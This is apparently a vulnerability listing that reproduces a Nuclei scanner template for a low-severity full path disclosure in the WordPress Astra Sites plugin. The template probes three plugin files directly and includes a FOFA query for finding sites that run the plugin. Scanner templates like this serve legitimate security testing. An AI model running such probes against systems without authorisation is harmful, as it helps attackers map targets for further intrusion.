漏洞描述
WordPress Starter Templates plugin is vulnerable to full path disclosure via direct access to plugin files.
wp-astra-sites-fpd: WordPress Astra Sites - Full Path Disclosure
PoC代码[已公开]
id: wp-astra-sites-fpd
info:
name: WordPress Astra Sites - Full Path Disclosure
author: ritikchaddha
severity: low
description: |
WordPress Starter Templates plugin is vulnerable to full path disclosure via direct access to plugin files.
reference:
- https://wordpress.org/plugins/astra-sites/
metadata:
verified: true
max-request: 3
vendor: developer
product: astra-sites
framework: wordpress
fofa-query: body="/wp-content/plugins/astra-sites/"
tags: wp,wordpress,wp-plugin,fpd,astra-sites,exposure
http:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/astra-sites/inc/classes/class-astra-sites.php"
- "{{BaseURL}}/wp-content/plugins/astra-sites/inc/classes/class-astra-sites-importer.php"
- "{{BaseURL}}/wp-content/plugins/astra-sites/inc/lib/starter-templates-importer/starter-templates-importer.php"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "Fatal error"
- "plugins/astra-sites"
- "Uncaught Error:"
condition: and
- type: status
status:
- 200
# digest: 4a0a00473045022078ff9f12f558ef247d026b0b9c228db9b66b462a4d88a643b479e4912c8efc8d022100d2e1d6d3986a9a9a9576550a8e369f1f894e5b3c91fb6758ed91bd1867ade709:922c64590222798bb761d5b6d8e72950